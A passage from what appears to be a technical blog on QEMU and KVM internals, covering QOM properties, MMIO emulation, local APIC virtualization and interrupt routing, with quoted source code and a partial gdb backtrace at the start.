    buf=0x7f329e50c004 "", len=4, is_write=false)
---Type <return> to continue, or q <return> to quit---
    at /home/test/qemu/exec.c:3374
#27 0x000055ce1f770021 in kvm_handle_io (port=368, attrs=..., 
    data=0x7f329e50c000, direction=0, size=4, count=2)
    at /home/test/qemu/accel/kvm/kvm-all.c:1731
#28 0x000055ce1f7712f9 in kvm_cpu_exec (cpu=0x631000028800)
    at /home/test/qemu/accel/kvm/kvm-all.c:1971
#29 0x000055ce1f6e5650 in qemu_kvm_cpu_thread_fn (arg=0x631000028800)
    at /home/test/qemu/cpus.c:1257
#30 0x000055ce20354746 in qemu_thread_start (args=0x603000024a60)
    at util/qemu-thread-posix.c:504
#31 0x00007f32a175b6db in start_thread (arg=0x7f329b8f9700)
    at pthread_create.c:463
#32 0x00007f32a148488f in clone ()

QOM Property

2018-09-05T00:00:00+00:00

Long time ago, I have discussed the class-based polymorphism in QOM. I have left one important aspect, that’s property which implements a prototype-based polymorphism. Properties is the interface export to external. Devices can set/get the property staticlly or dynamically. In this blog I will discuss how property is stored in QOM and how it interacts with other parts of QEMU.

Data structure

Both struct ‘ObjectClass’ and ‘Object’ has a GHashTable ‘properties’ fields, the former represents the common class properties and the latter represents the object’s properties.

struct ObjectClass
{
	/*< private >*/
	Type type;
	GSList *interfaces;

	const char *object_cast_cache[OBJECT_CLASS_CAST_CACHE];
	const char *class_cast_cache[OBJECT_CLASS_CAST_CACHE];

	ObjectUnparent *unparent;

	GHashTable *properties;
};

struct Object
{
	/*< private >*/
	ObjectClass *class;
	ObjectFree *free;
	GHashTable *properties;
	uint32_t ref;
	Object *parent;
};

A property is represented by struct ‘ObjectProperty’. It contains the basic information and the getter and setter function pointer.

typedef struct ObjectProperty
{
    gchar *name;
    gchar *type;
    gchar *description;
    ObjectPropertyAccessor *get;
    ObjectPropertyAccessor *set;
    ObjectPropertyResolve *resolve;
    ObjectPropertyRelease *release;
    void *opaque;
} ObjectProperty;

‘ObjectProperty’ is insert in the ‘properties’ hashtable, including struct ‘ObjectClass’ and ‘Object’.

For every kind of property, there is a concrete struct to describe it. For example.

//link property
typedef struct {
    Object **child;
    void (*check)(const Object *, const char *, Object *, Error **);
    ObjectPropertyLinkFlags flags;
} LinkProperty;

//string property
typedef struct StringProperty
{
    char *(*get)(Object *, Error **);
    void (*set)(Object *, const char *, Error **);
} StringProperty;

//bool property
typedef struct BoolProperty
{
    bool (*get)(Object *, Error **);
    void (*set)(Object *, bool, Error **);
} BoolProperty;

This concrete property is stored in the ‘ObjectProperty’s opaque field. Following picture the relation of these structures.

Object
+-----------+
|           |
|           |
+-----------+
| properties+----------+---------------------------------------------------->
+-----------+          ^
|           |          |
|           |          |
+-----------+      +---+----+
                   | name   |
                   +--------+
                   | type   |
                   +--------+
                   |  set   +-> property_set_bool
                   +--------+
                   |  get   +-> property_get_bool
                   +--------+
                   | opaque +----+ +---------+
                   +--------+      |  get    +--> memfd_backend_get_seal
                   ObjectProperty  +---------+
                                   |  set    +--> memfd_backend_set_seal
                                   +---------+
                                   BoolProperty

Interface

‘object_property_add’ is used to add a property to Object.

ObjectProperty *
object_property_add(Object *obj, const char *name, const char *type,
                    ObjectPropertyAccessor *get,
                    ObjectPropertyAccessor *set,
                    ObjectPropertyRelease *release,
                    void *opaque, Error **errp)
{
    ObjectProperty *prop;
    size_t name_len = strlen(name);

    if (name_len >= 3 && !memcmp(name + name_len - 3, "[*]", 4)) {
        int i;
        ObjectProperty *ret;
        char *name_no_array = g_strdup(name);

        name_no_array[name_len - 3] = '\0';
        for (i = 0; ; ++i) {
            char *full_name = g_strdup_printf("%s[%d]", name_no_array, i);

            ret = object_property_add(obj, full_name, type, get, set,
                                      release, opaque, NULL);
            g_free(full_name);
            if (ret) {
                break;
            }
        }
        g_free(name_no_array);
        return ret;
    }

    if (object_property_find(obj, name, NULL) != NULL) {
        error_setg(errp, "attempt to add duplicate property '%s'"
                   " to object (type '%s')", name,
                   object_get_typename(obj));
        return NULL;
    }

    prop = g_malloc0(sizeof(*prop));

    prop->name = g_strdup(name);
    prop->type = g_strdup(type);

    prop->get = get;
    prop->set = set;
    prop->release = release;
    prop->opaque = opaque;

    g_hash_table_insert(obj->properties, prop->name, prop);
    return prop;
}

First find if the ‘property’ name exists already, if not, just allocates a new ObjectProperty and insert it to the hashtable. The [*] case is not discussed here.

‘object_property_find’ is used to find if the Object has a property, this function will search all of the parent class’ properties of the object.

ObjectProperty *object_property_find(Object *obj, const char *name,
                                     Error **errp)
{
    ObjectProperty *prop;
    ObjectClass *klass = object_get_class(obj);

    prop = object_class_property_find(klass, name, NULL);
    if (prop) {
        return prop;
    }

    prop = g_hash_table_lookup(obj->properties, name);
    if (prop) {
        return prop;
    }

    error_setg(errp, "Property '.%s' not found", name);
    return NULL;
}

Example

Let’s take the ‘TYPE_DEVICE’ as example.

static const TypeInfo device_type_info = {
    .name = TYPE_DEVICE,
    .parent = TYPE_OBJECT,
    .instance_size = sizeof(DeviceState),
    .instance_init = device_initfn,
    .instance_post_init = device_post_init,
    .instance_finalize = device_finalize,
    .class_base_init = device_class_base_init,
    .class_init = device_class_init,
    .abstract = true,
    .class_size = sizeof(DeviceClass),
};

The instance init function is ‘device_initfn’. In this function we add some property such as ‘realized’, ‘hotpluggable’.

static void device_initfn(Object *obj)
{
    DeviceState *dev = DEVICE(obj);
    ObjectClass *class;
    Property *prop;

    if (qdev_hotplug) {
        dev->hotplugged = 1;
        qdev_hot_added = true;
    }

    dev->instance_id_alias = -1;
    dev->realized = false;

    object_property_add_bool(obj, "realized",
                             device_get_realized, device_set_realized, NULL);
    object_property_add_bool(obj, "hotpluggable",
                             device_get_hotpluggable, NULL, NULL);
    object_property_add_bool(obj, "hotplugged",
                             device_get_hotplugged, NULL,
                             &error_abort);

    class = object_get_class(OBJECT(dev));
    do {
        for (prop = DEVICE_CLASS(class)->props; prop && prop->name; prop++) {
            qdev_property_add_legacy(dev, prop, &error_abort);
            qdev_property_add_static(dev, prop, &error_abort);
        }
        class = object_class_get_parent(class);
    } while (class != object_class_by_name(TYPE_DEVICE));

    object_property_add_link(OBJECT(dev), "parent_bus", TYPE_BUS,
                             (Object **)&dev->parent_bus, NULL, 0,
                             &error_abort);
    QLIST_INIT(&dev->gpios);
}

The setter of ‘realized’ property function is ‘device_set_realized’.

For each device option in qemu command line, the main function calls ‘device_init_func’ which calls ‘qdev_device_add’.

static int device_init_func(void *opaque, QemuOpts *opts, Error **errp)
{
    Error *err = NULL;
    DeviceState *dev;

    dev = qdev_device_add(opts, &err);
    if (!dev) {
        error_report_err(err);
        return -1;
    }
    object_unref(OBJECT(dev));
    return 0;
}

In the it calls ‘object_property_set_bool’ to set the ‘realized’ property to be true.

	object_property_set_bool(OBJECT(dev), true, "realized", &err);

The object_property_set_bool’ calls ‘object_property_set’ and the latter function first calls the ObjectProperty’s set function(‘property_set_bool’), then in ‘property_set_bool’ it calls the BoolProperty’s set function, this is ‘device_set_realized’. So finally in ‘device_set_realized’ this function calls the DeviceClass’s realize function and initialized the device.

KVM MMIO implementation

2018-09-03T00:00:00+00:00

As already know, we can access devices by PIO and MMIO to drive devices to work. For PIO, we can set the VMCS to intercept the specified port. But how MMIO emulation is implemented? This blog will discuss this.

For a summary, the following shows the process of MMIO implementation:

QEMU declares a memory region(but not allocate ram or commit it to kvm)
Guest first access the MMIO address, cause a EPT violation VM-exit
KVM construct the EPT page table and marks the page table entry with special mark(110b)
Later the guest access these MMIO, it will be processed by EPT misconfig VM-exit handler

QEMU part

QEMU uses function ‘memory_region_init_io’ to declare a MMIO region. Here we can see the ‘mr->ram’ is false so no really memory is allocated.

void memory_region_init_io(MemoryRegion *mr,
                           Object *owner,
                           const MemoryRegionOps *ops,
                           void *opaque,
                           const char *name,
                           uint64_t size)
{
    memory_region_init(mr, owner, name, size);
    mr->ops = ops ? ops : &unassigned_mem_ops;
    mr->opaque = opaque;
    mr->terminates = true;
}

void memory_region_init_ram(MemoryRegion *mr,
                            Object *owner,
                            const char *name,
                            uint64_t size,
                            Error **errp)
{
    memory_region_init(mr, owner, name, size);
    mr->ram = true;
    mr->terminates = true;
    mr->destructor = memory_region_destructor_ram;
    mr->ram_block = qemu_ram_alloc(size, mr, errp);
    mr->dirty_log_mask = tcg_enabled() ? (1 << DIRTY_MEMORY_CODE) : 0;
}

When we commit this region to kvm it calls ‘kvm_region_add’ and ‘kvm_set_phys_mem’ will be called. If this is not a ram, it will just return and no memslot created/updated in kvm.

static void kvm_set_phys_mem(KVMMemoryListener *kml,
                             MemoryRegionSection *section, bool add)
{
    KVMState *s = kvm_state;
    KVMSlot *mem, old;
    int err;
    MemoryRegion *mr = section->mr;
    bool writeable = !mr->readonly && !mr->rom_device;


    if (!memory_region_is_ram(mr)) {
        if (writeable || !kvm_readonly_mem_allowed) {
            return;
        } else if (!mr->romd_mode) {
            /* If the memory device is not in romd_mode, then we actually want
             * to remove the kvm memory slot so all accesses will trap. */
            add = false;
        }
    }
}

KVM part

In ‘vmx_init’, when ept enabled, it calls ‘ept_set_mmio_spte_mask’.

static void ept_set_mmio_spte_mask(void)
{
	/*
	* EPT Misconfigurations can be generated if the value of bits 2:0
	* of an EPT paging-structure entry is 110b (write/execute).
	* Also, magic bits (0x3ull << 62) is set to quickly identify mmio
	* spte.
	*/
	kvm_mmu_set_mmio_spte_mask((0x3ull << 62) | 0x6ull);
}

void kvm_mmu_set_mmio_spte_mask(u64 mmio_mask)
{
	shadow_mmio_mask = mmio_mask;
}

Here set ‘shadow_mmio_mask’.

We the guest access the MMIO address, the VM will exit caused by ept violation and ‘tdp_page_fault’ will be called. ‘__direct_map’ will be called to construct the EPT page table.

After the long call-chain, the final function ‘mark_mmio_spte’ will be called to set the spte with ‘shadow_mmio_mask’ which as we already know is set when the vmx initialization.

__direct_map
    -->mmu_set_spte
        -->set_spte
            -->set_mmio_spte
                -->mark_mmio_spte

The condition to call ‘mark_mmio_spte’ is ‘is_noslot_pfn’.

static bool set_mmio_spte(struct kvm *kvm, u64 *sptep, gfn_t gfn,
			  pfn_t pfn, unsigned access)
{
	if (unlikely(is_noslot_pfn(pfn))) {
		mark_mmio_spte(kvm, sptep, gfn, access);
		return true;
	}

	return false;
}

static inline bool is_noslot_pfn(pfn_t pfn)
{
	return pfn == KVM_PFN_NOSLOT;
}

As we know the QEMU doesn’t commit the MMIO memory region, so pfn is ‘KVM_PFN_NOSLOT’ and then mark the spte with ‘shadow_mmio_mask’.

When the guest later access this MMIO page, as it’s ept page table entry is 110b, this will cause the VM exit by EPT misconfig, any how can a page be write/execute but no read permission. In the handler ‘handle_ept_misconfig’ it first process the MMIO case this will dispatch to the QEMU part.

static int handle_ept_misconfig(struct kvm_vcpu *vcpu)
{
	u64 sptes[4];
	int nr_sptes, i, ret;
	gpa_t gpa;

	gpa = vmcs_read64(GUEST_PHYSICAL_ADDRESS);

	ret = handle_mmio_page_fault_common(vcpu, gpa, true);
	if (likely(ret == RET_MMIO_PF_EMULATE))
		return x86_emulate_instruction(vcpu, gpa, 0, NULL, 0) ==
					      EMULATE_DONE;

	if (unlikely(ret == RET_MMIO_PF_INVALID))
		return kvm_mmu_page_fault(vcpu, gpa, 0, NULL, 0);

	if (unlikely(ret == RET_MMIO_PF_RETRY))
		return 1;

	/* It is the real ept misconfig */
	printk(KERN_ERR "EPT: Misconfiguration.\n");
	printk(KERN_ERR "EPT: GPA: 0x%llx\n", gpa);

	nr_sptes = kvm_mmu_get_spte_hierarchy(vcpu, gpa, sptes);

	for (i = PT64_ROOT_LEVEL; i > PT64_ROOT_LEVEL - nr_sptes; --i)
		ept_misconfig_inspect_spte(vcpu, sptes[i-1], i);

	vcpu->run->exit_reason = KVM_EXIT_UNKNOWN;
	vcpu->run->hw.hardware_exit_reason = EXIT_REASON_EPT_MISCONFIG;

	return 0;
}

Local APIC virtualization

2018-08-29T00:00:00+00:00

Background

In the last article, I write something about the software interrupt virtualization, the implementation of pic/ioapic/apic emulation in kvm. We know that in software emulation, for every guest-interrupt a VM-exit is needed, this is a very remarkable overhead for virtualization. As no surprise, the Intel has sollutions to solve this issue. This is called APIC virtualization.

Before we go to the APIC virtualization, we need first know something about local apic. The local APIC and IO APIC is for interrupt delivery in multi processors. Following picture shows the relations between IO APIC and local APIC.

In a word, every CPU has an accompanying local APIC (LAPIC) and the IOAPIC is used to dispatch interrupt to the LAPIC.

LAPIC base address

Software interacts with the local APIC by reading and writing its registers. APIC registers are memory-mapped to a 4-KByte region of the processor’s physical address space with an initial starting address of FEE00000H. For correct APIC operation, this address space must be mapped to an area of memory that has been designated as strong uncacheable (UC).

Here we should notice the FEE00000H is the physical address space, not the physical memory. What is the difference? I think physical address space is from CPU perspective. When the CPU reads/writes the APIC registers, it will process by the APIC just like intercept and will never go to the memory address. Though there is one LAPCI per CPU core, and they all map to the same address, when the CPU reads/writes this address, it will just access his own LAPIC and there is no conflicts.

APIC virtualization

So how to implement the feature in virtualization. I mean every VCPU can access their own physical address with the same address, but get the private data belong to the VCPU. Let’s first look at the qemu’s implementation. In LAPIC realize:

static void apic_realize(DeviceState *dev, Error **errp)
{
    APICCommonState *s = APIC(dev);

    if (s->id >= MAX_APICS) {
        error_setg(errp, "%s initialization failed. APIC ID %d is invalid",
                   object_get_typename(OBJECT(dev)), s->id);
        return;
    }

    memory_region_init_io(&s->io_memory, OBJECT(s), &apic_io_ops, s, "apic-msi",
                          APIC_SPACE_SIZE);

    s->timer = timer_new_ns(QEMU_CLOCK_VIRTUAL, apic_timer, s);
    local_apics[s->id] = s;

    msi_nonbroken = true;
}

We can see, the creating apic is stored in a global variable ‘local_apics’. In the access function, the function first need to decide the VCPU which is accessing the registers.

static void apic_mem_writel(void *opaque, hwaddr addr, uint32_t val)
{
    DeviceState *dev;
    APICCommonState *s;
    int index = (addr >> 4) & 0xff;
    if (addr > 0xfff || !index) {
        /* MSI and MMIO APIC are at the same memory location,
         * but actually not on the global bus: MSI is on PCI bus
         * APIC is connected directly to the CPU.
         * Mapping them on the global bus happens to work because
         * MSI registers are reserved in APIC MMIO and vice versa. */
        MSIMessage msi = { .address = addr, .data = val };
        apic_send_msi(&msi);
        return;
    }

    dev = cpu_get_current_apic();
    if (!dev) {
        return;
    }
    s = APIC(dev);
}

The idea behind qemu is easy, first get the current VCPU and then access his lapic. But how can this be done in APIC virtualization. How can CPU implement this without VM-exit. The secret is APIC-access page and virtual-APIC page. Here I will not go to the complicated detail of these two VMCS field. Just treat the virtual-APIC page as the shadow page of APIC-access page. And APIC-access page is for a VM, virtual-APIC page is for a VCPU. In fully APIC virtualization, When the guest access the APIC-access page the CPU will return the corresponding data in the virtual-APIC page.

The APIC-access page is set in ‘kvm->kvm_arch->apic_access_page’ and allocated in ‘alloc_apic_access_page’:

static int alloc_apic_access_page(struct kvm *kvm)
{
	struct page *page;
	struct kvm_userspace_memory_region kvm_userspace_mem;
	int r = 0;

	mutex_lock(&kvm->slots_lock);
	if (kvm->arch.apic_access_page)
		goto out;
	kvm_userspace_mem.slot = APIC_ACCESS_PAGE_PRIVATE_MEMSLOT;
	kvm_userspace_mem.flags = 0;
	kvm_userspace_mem.guest_phys_addr = 0xfee00000ULL;
	kvm_userspace_mem.memory_size = PAGE_SIZE;
	r = __kvm_set_memory_region(kvm, &kvm_userspace_mem);
	if (r)
		goto out;

	page = gfn_to_page(kvm, 0xfee00);
	if (is_error_page(page)) {
		r = -EFAULT;
		goto out;
	}

	kvm->arch.apic_access_page = page;
out:
	mutex_unlock(&kvm->slots_lock);
	return r;
}

Here we allocates the memslot of 0xfee00000 and set this to ‘apic_access_page’. The virtual-apic page is based in ‘kvm_lapic->regs’ and is allocated in :

int kvm_create_lapic(struct kvm_vcpu *vcpu)
{
	struct kvm_lapic *apic;

	ASSERT(vcpu != NULL);
	apic_debug("apic_init %d\n", vcpu->vcpu_id);

	apic = kzalloc(sizeof(*apic), GFP_KERNEL);
	if (!apic)
		goto nomem;

	vcpu->arch.apic = apic;

	apic->regs = (void *)get_zeroed_page(GFP_KERNEL);
	if (!apic->regs) {
		printk(KERN_ERR "malloc apic regs error for vcpu %x\n",
		       vcpu->vcpu_id);
		goto nomem_free_apic;
	}
	apic->vcpu = vcpu;
...
}

Then in ‘vmx_vcpu_reset’, it writes the APIC-access page and virtual-apic page to VMCS.

static void vmx_vcpu_reset(struct kvm_vcpu *vcpu)
{
	struct vcpu_vmx *vmx = to_vmx(vcpu);

	if (cpu_has_vmx_tpr_shadow()) {
		vmcs_write64(VIRTUAL_APIC_PAGE_ADDR, 0);
		if (vm_need_tpr_shadow(vmx->vcpu.kvm))
			vmcs_write64(VIRTUAL_APIC_PAGE_ADDR,
				     __pa(vmx->vcpu.arch.apic->regs));
		vmcs_write32(TPR_THRESHOLD, 0);
	}

	if (vm_need_virtualize_apic_accesses(vmx->vcpu.kvm))
		vmcs_write64(APIC_ACCESS_ADDR,
			     page_to_phys(vmx->vcpu.kvm->arch.apic_access_page));

	if (vmx_vm_has_apicv(vcpu->kvm))
		memset(&vmx->pi_desc, 0, sizeof(struct pi_desc));

	if (vmx->vpid != 0)
		vmcs_write16(VIRTUAL_PROCESSOR_ID, vmx->vpid);


	vpid_sync_context(vmx);
}

When the guest access the APIC register(from base 0xfee00000) it will then access the virtual-APIC page of the corresponding VCPU.

Later article will discuss the virtual interrupt delivery in APIC virtualization.

Reference

Intel SDM
https://software.intel.com/en-us/forums/intel-moderncode-for-parallel-architectures/topic/296237
https://software.intel.com/en-us/forums/virtualization-software-development/topic/284386

kvm interrupt emulation

2018-08-27T00:00:00+00:00

External interrupt

First of all, let’s clarify the external interrupt in kvm. This kind of interrupt means the interrupt for the host. kvm will be caused vm-exit when the CPU receives the external interrupt. THis is configured by flag PIN_BASED_EXT_INTR_MASK which is write to the VMCS’s pin-based VM-execution control field in function setup_vmcs_config. When the external interrupts comes, it will call handle_external_intr callback.

kvm_x86_ops->handle_external_intr(vcpu);

For intel CPU, this is the ‘vmx_handle_external_intr’.

static void vmx_handle_external_intr(struct kvm_vcpu *vcpu)
{
	u32 exit_intr_info = vmcs_read32(VM_EXIT_INTR_INFO);

	/*
	* If external interrupt exists, IF bit is set in rflags/eflags on the
	* interrupt stack frame, and interrupt will be enabled on a return
	* from interrupt handler.
	*/
	if ((exit_intr_info & (INTR_INFO_VALID_MASK | INTR_INFO_INTR_TYPE_MASK))
			== (INTR_INFO_VALID_MASK | INTR_TYPE_EXT_INTR)) {
		unsigned int vector;
		unsigned long entry;
		gate_desc *desc;
		struct vcpu_vmx *vmx = to_vmx(vcpu);
#ifdef CONFIG_X86_64
		unsigned long tmp;
#endif

		vector =  exit_intr_info & INTR_INFO_VECTOR_MASK;
		desc = (gate_desc *)vmx->host_idt_base + vector;
		entry = gate_offset(*desc);
		asm volatile(
#ifdef CONFIG_X86_64
			"mov %%" _ASM_SP ", %[sp]\n\t"
			"and $0xfffffffffffffff0, %%" _ASM_SP "\n\t"
			"push $%c[ss]\n\t"
			"push %[sp]\n\t"
#endif
			"pushf\n\t"
			"orl $0x200, (%%" _ASM_SP ")\n\t"
			__ASM_SIZE(push) " $%c[cs]\n\t"
			"call *%[entry]\n\t"
			:
#ifdef CONFIG_X86_64
			[sp]"=&r"(tmp)
#endif
			:
			[entry]"r"(entry),
			[ss]"i"(__KERNEL_DS),
			[cs]"i"(__KERNEL_CS)
			);
	} else
		local_irq_enable();
}

Here check is there a valid external interrupt exists(INTR_INFO_VALID_MASK ). If there is, just call the host interrupt handler.

That’s so easy, no mysterious.

Interrupt delivery methods

There are three generations of interrupt delivery and servicing on Intel architecture: XT-PIC for legacy uni-processor (UP) systems, IO-APIC for modern UP and multi-processor (MP) systems, and MSI.

XT-PIC

XT-PIC is the oldest form of interrupt delivery. It uses two intel 8259 PIC chips and each PIC chips has eight interrupts.

When a connected device needs servicing by the CPU, it drives the signal on the interrupt pin to which it is connected. The 8259 PIC in turn drives the interrupt line into the CPU. From the Intel 8259 PIC, the OS is able to determine what interrupt is pending. The CPU masks that interrupt and begins running the ISR associated with it. The ISR will check with the device with which it is associated for a pending interrupt. If the device has a pending interrupt, then the ISR will clear the Interrupt Request (IRQ) pending and begin servicing the device. Once the ISR has completed servicing the device, it will schedule a tasklet if more processing is needed and return control back to the OS, indicating that it handled an interrupt. Once the OS has serviced the interrupt, it will unmask the interrupt from the Intel 8259 PIC and run any tasklet which has been scheduled.

IO-APIC

When intel developed multiprocessor, he also introduced the concept of a Local-APIC (Advanced PIC) in the CPU and IO-APICs connected to devices. each IO-APIC (82093) has 24 interrupt lines. The IO-APCI provides backwards compatibility with the older XT-PIC model. As a result, the lower 16 interrupts are usually dedicated to their assignments under the XT-PIC model. This assignment of interrupts provides only eight additional interrupts, which forces sharing.The following is the sequence for IO-APIC delivery and servicing: • A device needing servicing from the CPU drives the interrupt line into the IO-APIC associated with it. • The IO-APIC writes the interrupt vector associated with its driven interrupt line into the Local APIC of the CPU. • The interrupted CPU begins running the ISRs associated with the interrupt vector it received. Each ISR for a shared interrupt is run to find the device needing service. Each device has its IRQ pending bit checked, and the requesting device has its bit cleared.

Message Signaled Interrupts (MSI)

The MSI model eliminates the devices’ need to use the IO-APIC, allowing every device to write directly to the CPU’s Local-APIC. The MSI model supports 224 interrupts, and, with this high number of interrupts, IRQ sharing is no longer allowed. The following is the sequence for MSI delivery and servicing: • A device needing servicing from the CPU generates an MSI, writing the interrupt vector directly into the Local-APIC of the CPU servicing it. • The interrupted CPU begins running the ISR associated with the interrupt vector it received. The device is serviced without any need to check and clear an IRQ pending bit

Following picture shows the relations of the three methods(From https://cloud.tencent.com/developer/article/1087271).

For the hardware the interrupt is generated by the device itself, so in virtualization environment the interrupt is generated in the device emulation. It can be generated both in qemu (device emulation implementation in userspace) kvm (device emulation implementation in kernel space).

The device emulation trigger an irq(< 16) and this will be both deliveried to i8259 and io-apic, and io-apic format the interrupt message and routing it to lapic. So there are three interrupt controller device need be emulated, the i8259, the io-apic and the lapic device. All of these devices can be implemented in qemu or in kvm all pic and io-apic in qemu and lapic in kvm.

Let’s first talk about the implementation in kvm.

KVM impplements the irqchip

The initialization of PIC and IO-APIC

PIC and IO-APIC is created by the VM ioctl ‘KVM_CREATE_IRQCHIP’. It’s called in ‘kvm_irqchip_create’ in qemu and is implemented in ‘kvm_arch_vm_ioctl’ in kvm. pic is created by function ‘kvm_create_pic’ and assigned to the ‘kvm->arch.vpic’. In the creation function, it allocates ‘kvm_pic’ and also register the device’s read/write ops.

Follow on the pic, it creates ioapic using function ‘kvm_ioapic_init’, like pic, the creation function allocates a ‘kvm_ioapic’ and register the read/write ops and also, assign this to the ‘kvm->arch.vioapic’.

After create the pic and ioapic, it calls ‘kvm_setup_default_irq_routing’ to setup the routing table.

int kvm_setup_default_irq_routing(struct kvm *kvm)
{
	return kvm_set_irq_routing(kvm, default_routing,
				   ARRAY_SIZE(default_routing), 0);
}

int kvm_set_irq_routing(struct kvm *kvm,
			const struct kvm_irq_routing_entry *ue,
			unsigned nr,
			unsigned flags)
{
	struct kvm_irq_routing_table *new, *old;
	u32 i, j, nr_rt_entries = 0;
	int r;

	for (i = 0; i < nr; ++i) {
		if (ue[i].gsi >= KVM_MAX_IRQ_ROUTES)
			return -EINVAL;
		nr_rt_entries = max(nr_rt_entries, ue[i].gsi);
	}

	nr_rt_entries += 1;

	new = kzalloc(sizeof(*new) + (nr_rt_entries * sizeof(struct hlist_head))
		      + (nr * sizeof(struct kvm_kernel_irq_routing_entry)),
		      GFP_KERNEL);

	if (!new)
		return -ENOMEM;

	new->rt_entries = (void *)&new->map[nr_rt_entries];

	new->nr_rt_entries = nr_rt_entries;
	for (i = 0; i < KVM_NR_IRQCHIPS; i++)
		for (j = 0; j < KVM_IRQCHIP_NUM_PINS; j++)
			new->chip[i][j] = -1;

	for (i = 0; i < nr; ++i) {
		r = -EINVAL;
		if (ue->flags)
			goto out;
		r = setup_routing_entry(new, &new->rt_entries[i], ue);
		if (r)
			goto out;
		++ue;
	}

	mutex_lock(&kvm->irq_lock);
	old = kvm->irq_routing;
	kvm_irq_routing_update(kvm, new);
	mutex_unlock(&kvm->irq_lock);

	synchronize_rcu();

	new = old;
	r = 0;

out:
	kfree(new);
	return r;
}

‘kvm_irq_routing_entry’ represents the irq routing entry. The default_routing is defined as follows.

static const struct kvm_irq_routing_entry default_routing[] = {
	ROUTING_ENTRY2(0), ROUTING_ENTRY2(1),
	ROUTING_ENTRY2(2), ROUTING_ENTRY2(3),
	ROUTING_ENTRY2(4), ROUTING_ENTRY2(5),
	ROUTING_ENTRY2(6), ROUTING_ENTRY2(7),
	ROUTING_ENTRY2(8), ROUTING_ENTRY2(9),
	ROUTING_ENTRY2(10), ROUTING_ENTRY2(11),
	ROUTING_ENTRY2(12), ROUTING_ENTRY2(13),
	ROUTING_ENTRY2(14), ROUTING_ENTRY2(15),
	ROUTING_ENTRY1(16), ROUTING_ENTRY1(17),
	ROUTING_ENTRY1(18), ROUTING_ENTRY1(19),
	ROUTING_ENTRY1(20), ROUTING_ENTRY1(21),
	ROUTING_ENTRY1(22), ROUTING_ENTRY1(23),
} 

For the irq < 16, it has two entries, one for pic and one for ioapic. The ioapic entry is in the front.

#define IOAPIC_ROUTING_ENTRY(irq) \
	{ .gsi = irq, .type = KVM_IRQ_ROUTING_IRQCHIP,	\
	  .u.irqchip.irqchip = KVM_IRQCHIP_IOAPIC, .u.irqchip.pin = (irq) }
#define ROUTING_ENTRY1(irq) IOAPIC_ROUTING_ENTRY(irq)

#ifdef CONFIG_X86
#  define PIC_ROUTING_ENTRY(irq) \
	{ .gsi = irq, .type = KVM_IRQ_ROUTING_IRQCHIP,	\
	  .u.irqchip.irqchip = SELECT_PIC(irq), .u.irqchip.pin = (irq) % 8 }
#  define ROUTING_ENTRY2(irq) \
	IOAPIC_ROUTING_ENTRY(irq), PIC_ROUTING_ENTRY(irq)

Here irqchip is 0,1 for pic and 2 for ioapic.
Goto function 'kvm\_set\_irq\_routing', this functions allocates a 'kvm\_irq\_routing\_table'.

struct kvm_irq_routing_table {
	int chip[KVM_NR_IRQCHIPS][KVM_IRQCHIP_NUM_PINS];
	struct kvm_kernel_irq_routing_entry *rt_entries;
	u32 nr_rt_entries;
	/*
	* Array indexed by gsi. Each entry contains list of irq chips
	* the gsi is connected to.
	*/
	struct hlist_head map[0];
};

Here ‘KVM_NR_IRQCHIPS’ is 3, means two pic chips and one io-apic chip. ‘KVM_IRQCHIP_NUM_PINS’ is 24 means the ioapic has 24 pins. Every irq has one ‘kvm_kernel_irq_routing_entry’.

For every ‘kvm_irq_routing_entry’, it calls ‘setup_routing_entry’ to initialize the ‘kvm_kernel_irq_routing_entry’.

static int setup_routing_entry(struct kvm_irq_routing_table *rt,
			       struct kvm_kernel_irq_routing_entry *e,
			       const struct kvm_irq_routing_entry *ue)
{
	int r = -EINVAL;
	struct kvm_kernel_irq_routing_entry *ei;

	/*
	* Do not allow GSI to be mapped to the same irqchip more than once.
	* Allow only one to one mapping between GSI and MSI.
	*/
	hlist_for_each_entry(ei, &rt->map[ue->gsi], link)
		if (ei->type == KVM_IRQ_ROUTING_MSI ||
		    ue->type == KVM_IRQ_ROUTING_MSI ||
		    ue->u.irqchip.irqchip == ei->irqchip.irqchip)
			return r;

	e->gsi = ue->gsi;
	e->type = ue->type;
	r = kvm_set_routing_entry(rt, e, ue);
	if (r)
		goto out;

	hlist_add_head(&e->link, &rt->map[e->gsi]);
	r = 0;
out:
	return r;
}

‘kvm_set_routing_entry’s work is to set the set callback function. For pic irq, sets the set to ‘kvm_set_pic_irq’, for ioapic irq, sets it to ‘kvm_set_ioapic_irq’. For the entry has the same gsi irq, it will linked by the field ‘link’ of ‘kvm_kernel_irq_routing_entry’.

int kvm_set_routing_entry(struct kvm_irq_routing_table *rt,
			  struct kvm_kernel_irq_routing_entry *e,
			  const struct kvm_irq_routing_entry *ue)
{
	int r = -EINVAL;
	int delta;
	unsigned max_pin;

	switch (ue->type) {
	case KVM_IRQ_ROUTING_IRQCHIP:
		delta = 0;
		switch (ue->u.irqchip.irqchip) {
		case KVM_IRQCHIP_PIC_MASTER:
			e->set = kvm_set_pic_irq;
			max_pin = PIC_NUM_PINS;
			break;
		case KVM_IRQCHIP_PIC_SLAVE:
			e->set = kvm_set_pic_irq;
			max_pin = PIC_NUM_PINS;
			delta = 8;
			break;
		case KVM_IRQCHIP_IOAPIC:
			max_pin = KVM_IOAPIC_NUM_PINS;
			e->set = kvm_set_ioapic_irq;
			break;
		default:
			goto out;
		}
	...
	}

	r = 0;
out:
	return r;
}

Following show the structure relation.

 kvm
 +-------------+
 |             |
 |             |
 |             |
 +-------------+           +---------------------+
 |irq_routing  +---------> |     chip            |
 +-------------+           +---------------------+
 |             |           |     rt_entries      +----------+
 |             |           +---------------------+          |
 |             |           |     nr_rt_entries   |          |
 +-------------+           +---------------------+          |
                           |     hlist_head ...  |          |
                           |                     |          |
                           |                     |          |
                           |                     |          |
                           +---------------------+ <--------+
kvm_kernel_irq_routing_entry                     |
                           |                     |
                           +---------------------+
                           |                     |
                           |  k^m_set_pic_irq    |
                           +---------------------+
                           |                     |
                           |                     |
                           +---------------------+
                           |                     |
                           |                     |
                           +---------------------+

Interrupt injection

The devices generate interrupt by calling function ‘kvm_set_irq’ in kvm.

int kvm_set_irq(struct kvm *kvm, int irq_source_id, u32 irq, int level,
		bool line_status)
{
	struct kvm_kernel_irq_routing_entry *e, irq_set[KVM_NR_IRQCHIPS];
	int ret = -1, i = 0;
	struct kvm_irq_routing_table *irq_rt;

	trace_kvm_set_irq(irq, level, irq_source_id);

	/* Not possible to detect if the guest uses the PIC or the
	* IOAPIC.  So set the bit in both. The guest will ignore
	* writes to the unused one.
	*/
